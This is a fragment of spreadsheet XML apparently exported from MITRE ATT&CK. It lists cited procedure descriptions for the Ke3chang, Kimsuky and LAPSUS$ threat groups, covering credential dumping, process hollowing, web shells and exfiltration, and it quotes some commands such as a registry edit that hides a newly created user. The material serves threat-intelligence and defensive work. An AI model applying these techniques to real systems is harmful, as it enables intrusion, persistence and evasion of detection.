    <t>[Ke3chang](https://attack.mitre.org/groups/G0004) has used the right-to-left override character in spearphishing attachment names to trick targets into executing .scr and .exe files.(Citation: Mandiant Operation Ke3chang November 2014)</t>
  </si>
  <si>
    <t>relationship--a5aebe97-98cc-46a5-b3f9-1a0497bc72ba</t>
  </si>
  <si>
    <t>[Ke3chang](https://attack.mitre.org/groups/G0004) actors have been known to copy files to the network shares of other computers to move laterally.(Citation: Mandiant Operation Ke3chang November 2014)(Citation: NCC Group APT15 Alive and Strong)</t>
  </si>
  <si>
    <t>relationship--42d2f816-9db2-47bf-9481-3065d038725d</t>
  </si>
  <si>
    <t>relationship--644d2862-2836-41dd-ba3f-05e23278a5e6</t>
  </si>
  <si>
    <t>[Ke3chang](https://attack.mitre.org/groups/G0004) has used a tool known as RemoteExec (similar to [PsExec](https://attack.mitre.org/software/S0029)) to remotely execute batch scripts and binaries.(Citation: NCC Group APT15 Alive and Strong)</t>
  </si>
  <si>
    <t>relationship--8bfa94cf-4eeb-442c-8f18-25b07cd3cbf5</t>
  </si>
  <si>
    <t>[Ke3chang](https://attack.mitre.org/groups/G0004) used a SharePoint enumeration and data dumping tool known as spwebmember.(Citation: NCC Group APT15 Alive and Strong)</t>
  </si>
  <si>
    <t>relationship--9725630d-a737-43dd-a68f-a09987735846</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</si>
  <si>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</si>
  <si>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relationship--f865403f-5b4a-4e5a-bb50-8d416ad36db4</t>
  </si>
  <si>
    <t>[Ke3chang](https://attack.mitre.org/groups/G0004) has used implants to collect the system language ID of a compromised machine.(Citation: Microsoft NICKEL December 2021)</t>
  </si>
  <si>
    <t>relationship--1a15d017-485e-403b-bad8-da8da074ffed</t>
  </si>
  <si>
    <t>[Ke3chang](https://attack.mitre.org/groups/G0004) has performed local network configuration discovery using &lt;code&gt;ipconfig&lt;/code&gt;.(Citation: Mandiant Operation Ke3chang November 2014)(Citation: NCC Group APT15 Alive and Strong)(Citation: Microsoft NICKEL December 2021)</t>
  </si>
  <si>
    <t>relationship--6fb6c639-cefa-4c7f-af89-26cb5fcd4030</t>
  </si>
  <si>
    <t>[Ke3chang](https://attack.mitre.org/groups/G0004) performs local network connection discovery using &lt;code&gt;netstat&lt;/code&gt;.(Citation: Mandiant Operation Ke3chang November 2014)(Citation: NCC Group APT15 Alive and Strong)</t>
  </si>
  <si>
    <t>relationship--eaa06586-e33e-4e4c-91ca-76935c22e012</t>
  </si>
  <si>
    <t>[Ke3chang](https://attack.mitre.org/groups/G0004) has used implants capable of collecting the signed-in username.(Citation: Microsoft NICKEL December 2021)</t>
  </si>
  <si>
    <t>relationship--199c92d9-dd54-4cb1-beef-3b6a97d12e82</t>
  </si>
  <si>
    <t>[Ke3chang](https://attack.mitre.org/groups/G0004) performs service discovery using &lt;code&gt;net start&lt;/code&gt; commands.(Citation: Mandiant Operation Ke3chang November 2014)</t>
  </si>
  <si>
    <t>relationship--7b529102-f95c-4ca1-a5c4-5a3497ab3674</t>
  </si>
  <si>
    <t>[Ke3chang](https://attack.mitre.org/groups/G0004) has obtained and used tools such as [Mimikatz](https://attack.mitre.org/software/S0002).(Citation: NCC Group APT15 Alive and Strong)</t>
  </si>
  <si>
    <t>relationship--77f919ce-1a18-4ee5-9979-1c9b818ca973</t>
  </si>
  <si>
    <t>[Ke3chang](https://attack.mitre.org/groups/G0004) has used credential dumpers or stealers to obtain legitimate credentials, which they used to gain access to victim accounts.(Citation: Microsoft NICKEL December 2021)</t>
  </si>
  <si>
    <t>relationship--d150b0e5-9e4b-48c4-a952-5234b3d72c6a</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</si>
  <si>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</si>
  <si>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relationship--cc79d8c5-f7c9-4c8b-810d-e57d70a07d4f</t>
  </si>
  <si>
    <t>[Ke3chang](https://attack.mitre.org/groups/G0004) has used batch scripts in its malware to install persistence mechanisms.(Citation: NCC Group APT15 Alive and Strong)</t>
  </si>
  <si>
    <t>relationship--cdd38074-895f-40e8-85fb-acc1aa4ecb69</t>
  </si>
  <si>
    <t>[Ke3chang](https://attack.mitre.org/groups/G0004) backdoor RoyalDNS established persistence through adding a service called &lt;code&gt;Nwsapagent&lt;/code&gt;.(Citation: NCC Group APT15 Alive and Strong)</t>
  </si>
  <si>
    <t>relationship--7b8c29ce-dda2-4608-a28f-40aca495048f</t>
  </si>
  <si>
    <t>[Kimsuky](https://attack.mitre.org/groups/G0094) has added accounts to specific groups with &lt;code&gt;net localgroup&lt;/code&gt;.(Citation: KISA Operation Muzabi)</t>
  </si>
  <si>
    <t>relationship--f5361de6-c729-4fe3-a37d-2d5ff95b31e2</t>
  </si>
  <si>
    <t>[Kimsuky](https://attack.mitre.org/groups/G0094) has used modified versions of PHProxy to examine web traffic between the victim and the accessed website.(Citation: CISA AA20-301A Kimsuky)</t>
  </si>
  <si>
    <t>relationship--81c1e9d6-f478-4adb-af70-cc92e8094e8a</t>
  </si>
  <si>
    <t>[Kimsuky](https://attack.mitre.org/groups/G0094) has used RC4 encryption before exfil.(Citation: Securelist Kimsuky Sept 2013)</t>
  </si>
  <si>
    <t>relationship--78f09c1a-8e37-4b2c-9296-d464be9b46c5</t>
  </si>
  <si>
    <t>26 August 2019</t>
  </si>
  <si>
    <t>[Kimsuky](https://attack.mitre.org/groups/G0094) has used QuickZip to archive stolen files before exfiltration.(Citation: Talos Kimsuky Nov 2021)</t>
  </si>
  <si>
    <t>relationship--b005a049-ecf3-4378-bff6-983b16f92482</t>
  </si>
  <si>
    <t>[Kimsuky](https://attack.mitre.org/groups/G0094) has used Blogspot pages for C2.(Citation: Talos Kimsuky Nov 2021)</t>
  </si>
  <si>
    <t>relationship--270a7179-63db-479d-95e5-84dccbe1aa3a</t>
  </si>
  <si>
    <t>[Kimsuky](https://attack.mitre.org/groups/G0094) has used Google Chrome browser extensions to infect victims and to steal passwords and cookies.(Citation: Zdnet Kimsuky Dec 2018)(Citation: Netscout Stolen Pencil Dec 2018)</t>
  </si>
  <si>
    <t>relationship--4c142924-33e7-4920-b1c7-9259d08fbb6e</t>
  </si>
  <si>
    <t>[Kimsuky](https://attack.mitre.org/groups/G0094) has a HWP document stealer module which changes the default program association in the registry to open HWP documents.(Citation: Securelist Kimsuky Sept 2013)</t>
  </si>
  <si>
    <t>relationship--b967963e-5dd4-42a3-a94e-8b3d17250aec</t>
  </si>
  <si>
    <t>[Kimsuky](https://attack.mitre.org/groups/G0094) has signed files with the name EGIS CO,. Ltd..(Citation: ThreatConnect Kimsuky September 2020)</t>
  </si>
  <si>
    <t>relationship--237b3167-feb7-4b28-990d-d810fe99a23b</t>
  </si>
  <si>
    <t>30 October 2020</t>
  </si>
  <si>
    <t>[Kimsuky](https://attack.mitre.org/groups/G0094) has used tools that are capable of obtaining credentials from saved mail.(Citation: Netscout Stolen Pencil Dec 2018)</t>
  </si>
  <si>
    <t>relationship--a89c60cc-5851-45bf-bcd6-f73f460351a5</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</si>
  <si>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</si>
  <si>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relationship--b6d8f711-8b5f-4b5e-82c4-abf144223c55</t>
  </si>
  <si>
    <t>[Kimsuky](https://attack.mitre.org/groups/G0094) has collected Office, PDF, and HWP documents from its victims.(Citation: Securelist Kimsuky Sept 2013)(Citation: Talos Kimsuky Nov 2021)</t>
  </si>
  <si>
    <t>relationship--035525fc-4549-4282-b85b-c7c07359124c</t>
  </si>
  <si>
    <t>[Kimsuky](https://attack.mitre.org/groups/G0094) has decoded malicious VBScripts using Base64.(Citation: Talos Kimsuky Nov 2021)</t>
  </si>
  <si>
    <t>relationship--1c7681f4-4dc4-4722-9fcc-a79712fe502e</t>
  </si>
  <si>
    <t>[Kimsuky](https://attack.mitre.org/groups/G0094) created and used a mailing toolkit to use in spearphishing attacks.(Citation: VirusBulletin Kimsuky October 2019)</t>
  </si>
  <si>
    <t>relationship--2098e2bc-2b20-463a-9862-20fe68268cfc</t>
  </si>
  <si>
    <t>02 November 2020</t>
  </si>
  <si>
    <t>[Kimsuky](https://attack.mitre.org/groups/G0094) has been observed disabling the system firewall.(Citation: Securelist Kimsuky Sept 2013)</t>
  </si>
  <si>
    <t>relationship--c2480447-a55d-446e-8d62-88c6a4f08afb</t>
  </si>
  <si>
    <t>[Kimsuky](https://attack.mitre.org/groups/G0094) has been observed turning off Windows Security Center and can hide the AV software window from the view of the infected user.(Citation: Securelist Kimsuky Sept 2013)(Citation: Talos Kimsuky Nov 2021)</t>
  </si>
  <si>
    <t>relationship--c84d253b-b26f-48e8-81ca-cc961f0b2360</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</si>
  <si>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</si>
  <si>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relationship--5f601200-9fcd-44b7-96c2-5a2a1daea489</t>
  </si>
  <si>
    <t>[Kimsuky](https://attack.mitre.org/groups/G0094) has compromised legitimate sites and used them to distribute malware.(Citation: KISA Operation Muzabi)</t>
  </si>
  <si>
    <t>relationship--976a08e5-40b0-4b9f-a453-a1d0b33c3080</t>
  </si>
  <si>
    <t>[Kimsuky](https://attack.mitre.org/groups/G0094) has compromised email accounts to send spearphishing e-mails.(Citation: VirusBulletin Kimsuky October 2019)(Citation: Malwarebytes Kimsuky June 2021)</t>
  </si>
  <si>
    <t>relationship--78073196-9fea-4d84-a457-6b51afb71ed1</t>
  </si>
  <si>
    <t>[Kimsuky](https://attack.mitre.org/groups/G0094) has created email accounts for phishing operations.(Citation: KISA Operation Muzabi)</t>
  </si>
  <si>
    <t>relationship--09583053-9fab-47bb-b07c-76d75cbb5c30</t>
  </si>
  <si>
    <t>[Kimsuky](https://attack.mitre.org/groups/G0094) has collected valid email addresses that were subsequently used in spearphishing campaigns.(Citation: Malwarebytes Kimsuky June 2021)</t>
  </si>
  <si>
    <t>relationship--9801b87a-29e0-4252-81e6-50bbc32d1940</t>
  </si>
  <si>
    <t>[Kimsuky](https://attack.mitre.org/groups/G0094) has set auto-forward rules on victim's e-mail accounts.(Citation: CISA AA20-301A Kimsuky)</t>
  </si>
  <si>
    <t>relationship--e8523d2e-2552-4d14-8980-dde0923c803d</t>
  </si>
  <si>
    <t>[Kimsuky](https://attack.mitre.org/groups/G0094) has collected victim employee name information.(Citation: KISA Operation Muzabi)</t>
  </si>
  <si>
    <t>relationship--487ea754-d2dd-4e54-b16d-4e90d4e9bddb</t>
  </si>
  <si>
    <t>[Kimsuky](https://attack.mitre.org/groups/G0094) has exfiltrated data over its C2 channel.(Citation: Securelist Kimsuky Sept 2013)(Citation: Talos Kimsuky Nov 2021)</t>
  </si>
  <si>
    <t>relationship--91f79ff4-3850-4e37-807a-fe303b312e23</t>
  </si>
  <si>
    <t>[Kimsuky](https://attack.mitre.org/groups/G0094) has exfiltrated stolen files and data to actor-controlled Blogspot accounts.(Citation: Talos Kimsuky Nov 2021)</t>
  </si>
  <si>
    <t>relationship--21511746-7782-42f2-ba77-b189777ef66c</t>
  </si>
  <si>
    <t>[Kimsuky](https://attack.mitre.org/groups/G0094) has exploited various vulnerabilities for initial access, including Microsoft Exchange vulnerability CVE-2020-0688.(Citation: KISA Operation Muzabi)</t>
  </si>
  <si>
    <t>relationship--33eb4a61-d966-4193-a8e5-237eb5a5129a</t>
  </si>
  <si>
    <t>[Kimsuky](https://attack.mitre.org/groups/G0094) has obtained exploit code for various CVEs.(Citation: KISA Operation Muzabi)</t>
  </si>
  <si>
    <t>relationship--c26aa411-a68f-4093-b681-c899694cfa19</t>
  </si>
  <si>
    <t>[Kimsuky](https://attack.mitre.org/groups/G0094) has used RDP to establish persistence.(Citation: CISA AA20-301A Kimsuky)</t>
  </si>
  <si>
    <t>relationship--9655304e-7bdb-4375-8789-2bfecc5b0a64</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</si>
  <si>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</si>
  <si>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relationship--4cd705fd-5192-4248-9627-4f6cf2d4c459</t>
  </si>
  <si>
    <t>[Kimsuky](https://attack.mitre.org/groups/G0094) has used FTP to download additional malware to the target machine.(Citation: VirusBulletin Kimsuky October 2019)</t>
  </si>
  <si>
    <t>relationship--eabe052b-cecc-4d80-92c9-150e8c8dbcdd</t>
  </si>
  <si>
    <t>[Kimsuky](https://attack.mitre.org/groups/G0094) has the ability to enumerate all files and directories on an infected system.(Citation: Securelist Kimsuky Sept 2013)(Citation: Talos Kimsuky Nov 2021)(Citation: KISA Operation Muzabi)</t>
  </si>
  <si>
    <t>relationship--cdd92791-3bc2-4a1f-89b4-3eced4aa667f</t>
  </si>
  <si>
    <t>[Kimsuky](https://attack.mitre.org/groups/G0094) has collected victim organization information including but not limited to organization hierarchy, functions, press releases, and others.(Citation: KISA Operation Muzabi)</t>
  </si>
  <si>
    <t>relationship--63603405-b343-4e11-9ae0-3ece75611894</t>
  </si>
  <si>
    <t>[Kimsuky](https://attack.mitre.org/groups/G0094) has run &lt;code&gt;reg add ‘HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList’ /v&lt;/code&gt; to hide a newly created user.(Citation: KISA Operation Muzabi)</t>
  </si>
  <si>
    <t>relationship--4b889a3a-289f-444f-946d-b8bc2dd16627</t>
  </si>
  <si>
    <t>[Kimsuky](https://attack.mitre.org/groups/G0094) has used an information gathering module that will hide an AV software window from the victim.(Citation: Talos Kimsuky Nov 2021)</t>
  </si>
  <si>
    <t>relationship--ce0e4e49-3c40-4bce-96bd-460df4cb2124</t>
  </si>
  <si>
    <t>[Kimsuky](https://attack.mitre.org/groups/G0094) has downloaded additional scripts, tools, and malware onto victim systems.(Citation: Crowdstrike GTR2020 Mar 2020)(Citation: Talos Kimsuky Nov 2021)</t>
  </si>
  <si>
    <t>relationship--2011a4ee-6b40-45a1-8bcf-f19568d16d02</t>
  </si>
  <si>
    <t>[Kimsuky](https://attack.mitre.org/groups/G0094) has sent internal spearphishing emails for lateral movement after stealing victim information.(Citation: KISA Operation Muzabi)</t>
  </si>
  <si>
    <t>relationship--31f9cd5d-bfb6-4764-a724-8e8f131099d1</t>
  </si>
  <si>
    <t>[Kimsuky](https://attack.mitre.org/groups/G0094) has used JScript for logging and downloading additional tools.(Citation: VirusBulletin Kimsuky October 2019)(Citation: CISA AA20-301A Kimsuky)</t>
  </si>
  <si>
    <t>relationship--98b90b49-f152-4eb5-8bb7-3b6c68bf9646</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</si>
  <si>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</si>
  <si>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relationship--a70ec2cc-5eeb-41c3-8dd3-2816a9010104</t>
  </si>
  <si>
    <t>[Kimsuky](https://attack.mitre.org/groups/G0094) has gathered credentials using [Mimikatz](https://attack.mitre.org/software/S0002) and ProcDump.(Citation: CISA AA20-301A Kimsuky)(Citation: Netscout Stolen Pencil Dec 2018)(Citation: KISA Operation Muzabi)</t>
  </si>
  <si>
    <t>relationship--eb67e50e-84ac-495d-8374-547ef1f34f4f</t>
  </si>
  <si>
    <t>[Kimsuky](https://attack.mitre.org/groups/G0094) has created accounts with &lt;code&gt;net user&lt;/code&gt;.(Citation: KISA Operation Muzabi)</t>
  </si>
  <si>
    <t>relationship--6852e4b7-b1de-417a-b8db-370d04d8c072</t>
  </si>
  <si>
    <t>[Kimsuky](https://attack.mitre.org/groups/G0094) has used a tool called GREASE to add a Windows admin account in order to allow them continued access via RDP.(Citation: Netscout Stolen Pencil Dec 2018)</t>
  </si>
  <si>
    <t>relationship--184bf796-4f6d-4d0e-921e-08eb3023b97e</t>
  </si>
  <si>
    <t>[Kimsuky](https://attack.mitre.org/groups/G0094) has staged collected data files under &lt;code&gt;C:\Program Files\Common Files\System\Ole DB\&lt;/code&gt;.(Citation: CISA AA20-301A Kimsuky)(Citation: Talos Kimsuky Nov 2021)</t>
  </si>
  <si>
    <t>relationship--a535c99e-66f2-47c9-aa25-352c90efd2ff</t>
  </si>
  <si>
    <t>[Kimsuky](https://attack.mitre.org/groups/G0094) has used e-mail to send exfiltrated data to C2 servers.(Citation: CISA AA20-301A Kimsuky)</t>
  </si>
  <si>
    <t>relationship--a573685b-3135-44ae-9f9a-844dfc5bdaa2</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</si>
  <si>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</si>
  <si>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relationship--0e37d046-454c-4463-b27f-f348ef6f817e</t>
  </si>
  <si>
    <t>[Kimsuky](https://attack.mitre.org/groups/G0094) has lured victims into clicking malicious links.(Citation: KISA Operation Muzabi)</t>
  </si>
  <si>
    <t>relationship--2ba344c1-aa24-4566-9df0-2556363fe8eb</t>
  </si>
  <si>
    <t>[Kimsuky](https://attack.mitre.org/groups/G0094) has developed its own unique malware such as MailFetch.py for use in operations.(Citation: KISA Operation Muzabi)(Citation: Talos Kimsuky Nov 2021)</t>
  </si>
  <si>
    <t>relationship--062f7bee-8b54-4edd-aca9-11437b7cbc8b</t>
  </si>
  <si>
    <t>[Kimsuky](https://attack.mitre.org/groups/G0094) has disguised services to appear as benign software or related to operating system functions.(Citation: CISA AA20-301A Kimsuky)</t>
  </si>
  <si>
    <t>relationship--2447ac98-019d-40a9-8913-c97d6eb93d90</t>
  </si>
  <si>
    <t>[Kimsuky](https://attack.mitre.org/groups/G0094) has disguised its C2 addresses as the websites of shopping malls, governments, universities, and others.(Citation: KISA Operation Muzabi)</t>
  </si>
  <si>
    <t>relationship--9488374f-6b53-4b54-a37a-a379089d7023</t>
  </si>
  <si>
    <t>[Kimsuky](https://attack.mitre.org/groups/G0094) has renamed malware to legitimate names such as &lt;code&gt;ESTCommon.dll&lt;/code&gt; or &lt;code&gt;patch.dll&lt;/code&gt;.(Citation: KISA Operation Muzabi)</t>
  </si>
  <si>
    <t>relationship--dbbef446-8cc0-43cc-bfae-6fc6d7310e67</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</si>
  <si>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</si>
  <si>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relationship--c1566ee0-3ddb-4482-94dc-eb05e35e7afa</t>
  </si>
  <si>
    <t>[Kimsuky](https://attack.mitre.org/groups/G0094) has used mshta.exe to run malicious scripts on the system.(Citation: EST Kimsuky April 2019)(Citation: CISA AA20-301A Kimsuky)(Citation: Crowdstrike GTR2020 Mar 2020)(Citation: KISA Operation Muzabi)</t>
  </si>
  <si>
    <t>relationship--90f03f42-a2f1-4fab-8a10-ebbbbc4fba19</t>
  </si>
  <si>
    <t>[Kimsuky](https://attack.mitre.org/groups/G0094) has used a proprietary tool to intercept one time passwords required for two-factor authentication.(Citation: KISA Operation Muzabi)</t>
  </si>
  <si>
    <t>relationship--58996a9f-ab17-4942-9afd-bb336af9a15b</t>
  </si>
  <si>
    <t>[Kimsuky](https://attack.mitre.org/groups/G0094) has used the Nirsoft SniffPass network sniffer to obtain passwords sent over non-secure protocols.(Citation: CISA AA20-301A Kimsuky)(Citation: Netscout Stolen Pencil Dec 2018)</t>
  </si>
  <si>
    <t>relationship--0f36ee85-8906-40c6-be53-87bc96499763</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</si>
  <si>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</si>
  <si>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relationship--a17d1fee-c44e-4e38-85be-68e7dff9d69c</t>
  </si>
  <si>
    <t>[Kimsuky](https://attack.mitre.org/groups/G0094) has used pass the hash for authentication to remote access software used in C2.(Citation: CISA AA20-301A Kimsuky)</t>
  </si>
  <si>
    <t>relationship--80e06d13-4c96-464c-9b9f-d0cb2b5fac18</t>
  </si>
  <si>
    <t>[Kimsuky](https://attack.mitre.org/groups/G0094) has executed a variety of PowerShell scripts.(Citation: EST Kimsuky April 2019)(Citation: CISA AA20-301A Kimsuky)(Citation: Talos Kimsuky Nov 2021)(Citation: KISA Operation Muzabi)</t>
  </si>
  <si>
    <t>relationship--c2379d5f-4d8d-4eaa-b966-bf31b227f5e3</t>
  </si>
  <si>
    <t>[Kimsuky](https://attack.mitre.org/groups/G0094) can gather a list of all processes running on a victim's machine.(Citation: Talos Kimsuky Nov 2021)</t>
  </si>
  <si>
    <t>relationship--ba7a0a7d-3a54-480f-86ce-f92d29dbabe1</t>
  </si>
  <si>
    <t>[Kimsuky](https://attack.mitre.org/groups/G0094) has used a file injector DLL to spawn a benign process on the victim's system and inject the malicious payload into it via process hollowing.(Citation: Talos Kimsuky Nov 2021)</t>
  </si>
  <si>
    <t>relationship--e5bfb355-b834-48db-8d79-9067127ed82b</t>
  </si>
  <si>
    <t>[Kimsuky](https://attack.mitre.org/groups/G0094) has used Win7Elevate to inject malicious code into explorer.exe.(Citation: Securelist Kimsuky Sept 2013)</t>
  </si>
  <si>
    <t>relationship--bd648f03-7313-4e05-bd6e-b499f76a295c</t>
  </si>
  <si>
    <t>27 August 2019</t>
  </si>
  <si>
    <t>[Kimsuky](https://attack.mitre.org/groups/G0094) has used a macOS Python implant to gather data as well as MailFetcher.py code to automatically collect email data.(Citation: CISA AA20-301A Kimsuky)(Citation: KISA Operation Muzabi)</t>
  </si>
  <si>
    <t>relationship--f8372a2e-6db4-4353-9635-b1fcac9f90ed</t>
  </si>
  <si>
    <t>[Kimsuky](https://attack.mitre.org/groups/G0094) has obtained specific Registry keys and values on a compromised host.(Citation: Talos Kimsuky Nov 2021)</t>
  </si>
  <si>
    <t>relationship--62784c03-0ee3-4a53-ba0e-876db5ede08a</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</si>
  <si>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</si>
  <si>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relationship--c5ae9551-e756-4b8b-9b78-515eba60acf5</t>
  </si>
  <si>
    <t>[Kimsuky](https://attack.mitre.org/groups/G0094) has executed malware with &lt;code&gt;regsvr32s&lt;/code&gt;.(Citation: KISA Operation Muzabi)</t>
  </si>
  <si>
    <t>relationship--c3688800-5bf2-4e2f-93ed-27f66d3be8bd</t>
  </si>
  <si>
    <t>[Kimsuky](https://attack.mitre.org/groups/G0094) has used a modified TeamViewer client as a command and control channel.(Citation: Securelist Kimsuky Sept 2013)(Citation: Crowdstrike GTR2020 Mar 2020)</t>
  </si>
  <si>
    <t>relationship--4fc9c0a5-952f-4726-8c53-39fbf40a67e3</t>
  </si>
  <si>
    <t>[Kimsuky](https://attack.mitre.org/groups/G0094) has used RDP for direct remote point-and-click access.(Citation: Netscout Stolen Pencil Dec 2018)</t>
  </si>
  <si>
    <t>relationship--0854ea2c-21b0-49b9-bb90-3653384f2de9</t>
  </si>
  <si>
    <t>[Kimsuky](https://attack.mitre.org/groups/G0094) has used tools such as the MailFetch mail crawler to collect victim emails (excluding spam) from online services via IMAP.(Citation: KISA Operation Muzabi)</t>
  </si>
  <si>
    <t>relationship--fc0baea6-7e98-4cc3-9462-7eee9564cad0</t>
  </si>
  <si>
    <t>[Kimsuky](https://attack.mitre.org/groups/G0094) has used `rundll32.exe` to execute malicious scripts and malware on a victim's network.(Citation: Talos Kimsuky Nov 2021)</t>
  </si>
  <si>
    <t>relationship--49b4d1e6-1f0c-4e66-a9f1-51dc32615e69</t>
  </si>
  <si>
    <t>[Kimsuky](https://attack.mitre.org/groups/G0094) has downloaded additional malware with scheduled tasks.(Citation: KISA Operation Muzabi)</t>
  </si>
  <si>
    <t>relationship--db2be919-e747-430b-a7ee-d619a11abd93</t>
  </si>
  <si>
    <t>[Kimsuky](https://attack.mitre.org/groups/G0094) has searched for vulnerabilities, tools, and geopolitical trends on Google to target victims.(Citation: KISA Operation Muzabi)</t>
  </si>
  <si>
    <t>relationship--df5d8477-81dd-482b-a435-749a68727c49</t>
  </si>
  <si>
    <t>[Kimsuky](https://attack.mitre.org/groups/G0094) has searched for information on the target company's website.(Citation: KISA Operation Muzabi)</t>
  </si>
  <si>
    <t>relationship--5d705563-a639-4ec1-a19d-f797c1c0c078</t>
  </si>
  <si>
    <t>[Kimsuky](https://attack.mitre.org/groups/G0094) has checked for the presence of antivirus software with &lt;code&gt;powershell Get-CimInstance -Namespace root/securityCenter2 – classname antivirusproduct&lt;/code&gt;.(Citation: KISA Operation Muzabi)</t>
  </si>
  <si>
    <t>relationship--8bfac9d6-8d6d-4a2f-9718-4015f231fdae</t>
  </si>
  <si>
    <t>[Kimsuky](https://attack.mitre.org/groups/G0094) has purchased hosting servers with virtual currency and prepaid cards.(Citation: KISA Operation Muzabi)</t>
  </si>
  <si>
    <t>relationship--546cf516-55b1-49cf-9807-5752c222f906</t>
  </si>
  <si>
    <t>[Kimsuky](https://attack.mitre.org/groups/G0094) has used Twitter to monitor potential victims and to prepare targeted phishing e-mails.(Citation: Malwarebytes Kimsuky June 2021)</t>
  </si>
  <si>
    <t>relationship--3d78512d-1a97-4132-8d8f-cd9ceaf03246</t>
  </si>
  <si>
    <t>[Kimsuky](https://attack.mitre.org/groups/G0094) has created social media accounts to monitor news and security trends as well as potential targets.(Citation: KISA Operation Muzabi)</t>
  </si>
  <si>
    <t>relationship--6514cf17-0e40-4858-bd3e-58c8fb70796a</t>
  </si>
  <si>
    <t>[Kimsuky](https://attack.mitre.org/groups/G0094) has packed malware with UPX.(Citation: Malwarebytes Kimsuky June 2021)</t>
  </si>
  <si>
    <t>relationship--a78cd480-758b-4fb5-a60a-ecb86d837012</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</si>
  <si>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</si>
  <si>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relationship--b9f1dec0-f9b8-4cc3-a26c-5fc819f603a0</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</si>
  <si>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</si>
  <si>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relationship--0f7756fb-ea96-4d3a-9a23-a0f0a326de63</t>
  </si>
  <si>
    <t>[Kimsuky](https://attack.mitre.org/groups/G0094) has used links in e-mail to steal account information.(Citation: VirusBulletin Kimsuky October 2019)(Citation: Malwarebytes Kimsuky June 2021)(Citation: KISA Operation Muzabi)</t>
  </si>
  <si>
    <t>relationship--7d101f53-3b5a-467a-aeb8-172cd77e92ce</t>
  </si>
  <si>
    <t>[Kimsuky](https://attack.mitre.org/groups/G0094) has enumerated drives, OS type, OS version, and other information using a script or the "systeminfo" command.(Citation: Securelist Kimsuky Sept 2013)(Citation: Talos Kimsuky Nov 2021)</t>
  </si>
  <si>
    <t>relationship--96a9cf17-42b0-4317-82e6-55e42a2dab41</t>
  </si>
  <si>
    <t>[Kimsuky](https://attack.mitre.org/groups/G0094) has used `ipconfig/all` to gather network configuration information.(Citation: Talos Kimsuky Nov 2021)</t>
  </si>
  <si>
    <t>relationship--b3c3bcb2-3b6a-472f-b0b5-edd93c311d91</t>
  </si>
  <si>
    <t>[Kimsuky](https://attack.mitre.org/groups/G0094) has used an instrumentor script to gather the names of all services running on a victim's system.(Citation: Talos Kimsuky Nov 2021)</t>
  </si>
  <si>
    <t>relationship--73d7126b-3e7a-441c-93e0-9803aec12ca5</t>
  </si>
  <si>
    <t>[Kimsuky](https://attack.mitre.org/groups/G0094) has manipulated timestamps for creation or compilation dates to defeat anti-forensics.(Citation: Cybereason Kimsuky November 2020)</t>
  </si>
  <si>
    <t>relationship--7bc61687-f105-403f-b83f-91168c8f41ad</t>
  </si>
  <si>
    <t>[Kimsuky](https://attack.mitre.org/groups/G0094) has obtained and used tools such as Nirsoft WebBrowserPassVIew, [Mimikatz](https://attack.mitre.org/software/S0002), and [PsExec](https://attack.mitre.org/software/S0029).(Citation: Netscout Stolen Pencil Dec 2018)(Citation: Talos Kimsuky Nov 2021)</t>
  </si>
  <si>
    <t>relationship--164bf82a-10bf-4a6d-b43c-70ff11f60229</t>
  </si>
  <si>
    <t>[Kimsuky](https://attack.mitre.org/groups/G0094) has used Blogspot to host malicious content such as beacons, file exfiltrators, and implants.(Citation: Talos Kimsuky Nov 2021)</t>
  </si>
  <si>
    <t>relationship--1ff37097-9ec1-42cd-bdd6-52d74ab8e3b5</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</si>
  <si>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</si>
  <si>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relationship--ee4701f6-e4a5-41c8-ab72-118aead20a76</t>
  </si>
  <si>
    <t>[Kimsuky](https://attack.mitre.org/groups/G0094)  has used HTTP GET and POST requests for C2.(Citation: Talos Kimsuky Nov 2021)</t>
  </si>
  <si>
    <t>relationship--6479de0b-2907-4346-95a4-063af662c689</t>
  </si>
  <si>
    <t>[Kimsuky](https://attack.mitre.org/groups/G0094) has hosted content used for targeting efforts via web services such as Blogspot.(Citation: Talos Kimsuky Nov 2021)</t>
  </si>
  <si>
    <t>relationship--ccc79ae5-de3c-4955-8179-2c4aa652613d</t>
  </si>
  <si>
    <t>[Kimsuky](https://attack.mitre.org/groups/G0094) has used modified versions of open source PHP web shells to maintain access, often adding "Dinosaur" references within the code.(Citation: CISA AA20-301A Kimsuky)</t>
  </si>
  <si>
    <t>relationship--f873875b-5be1-4a6d-81aa-d61a922df087</t>
  </si>
  <si>
    <t>[Kimsuky](https://attack.mitre.org/groups/G0094) has executed Windows commands by using `cmd` and running batch scripts.(Citation: Talos Kimsuky Nov 2021)(Citation: KISA Operation Muzabi)</t>
  </si>
  <si>
    <t>relationship--5f285b2f-15d8-4f74-9a25-693c32635d43</t>
  </si>
  <si>
    <t>[Kimsuky](https://attack.mitre.org/groups/G0094) has created new services for persistence.(Citation: Securelist Kimsuky Sept 2013)(Citation: CISA AA20-301A Kimsuky)</t>
  </si>
  <si>
    <t>relationship--c899111b-c3ae-4760-b87f-fce9f21af1f2</t>
  </si>
  <si>
    <t>[LAPSUS$](https://attack.mitre.org/groups/G1004) has removed a targeted organization's global admin accounts to lock the organization out of all access.(Citation: MSTIC DEV-0537 Mar 2022)</t>
  </si>
  <si>
    <t>relationship--a2798404-09a6-4882-8226-257fe55f788c</t>
  </si>
  <si>
    <t>10 June 2022</t>
  </si>
  <si>
    <t>[LAPSUS$](https://attack.mitre.org/groups/G1004) has added the global admin role to accounts they have created in the targeted organization's cloud instances.(Citation: MSTIC DEV-0537 Mar 2022)</t>
  </si>
  <si>
    <t>relationship--bbd4f6df-b4e4-4e8e-8811-41212aef6264</t>
  </si>
  <si>
    <t>[LAPSUS$](https://attack.mitre.org/groups/G1004) has gathered detailed knowledge of an organization's supply chain relationships.(Citation: MSTIC DEV-0537 Mar 2022)</t>
  </si>
  <si>
    <t>relationship--7e27f405-1e18-44d7-81d7-bbad57cba9b7</t>
  </si>
  <si>
    <t>[LAPSUS$](https://attack.mitre.org/groups/G1004) has targeted various collaboration tools like Slack, Teams, JIRA, Confluence, and others to hunt for exposed credentials to support privilege escalation and lateral movement.(Citation: MSTIC DEV-0537 Mar 2022)</t>
  </si>
  <si>
    <t>relationship--65ebc3e9-e5c1-402d-8d1e-873689b09396</t>
  </si>
  <si>
    <t>[LAPSUS$](https://attack.mitre.org/groups/G1004) has created global admin accounts in the targeted organization's cloud instances to gain persistence.(Citation: MSTIC DEV-0537 Mar 2022)</t>
  </si>
  <si>
    <t>relationship--7344f9ce-b2ec-4754-b980-4d8d1464d35d</t>
  </si>
  <si>
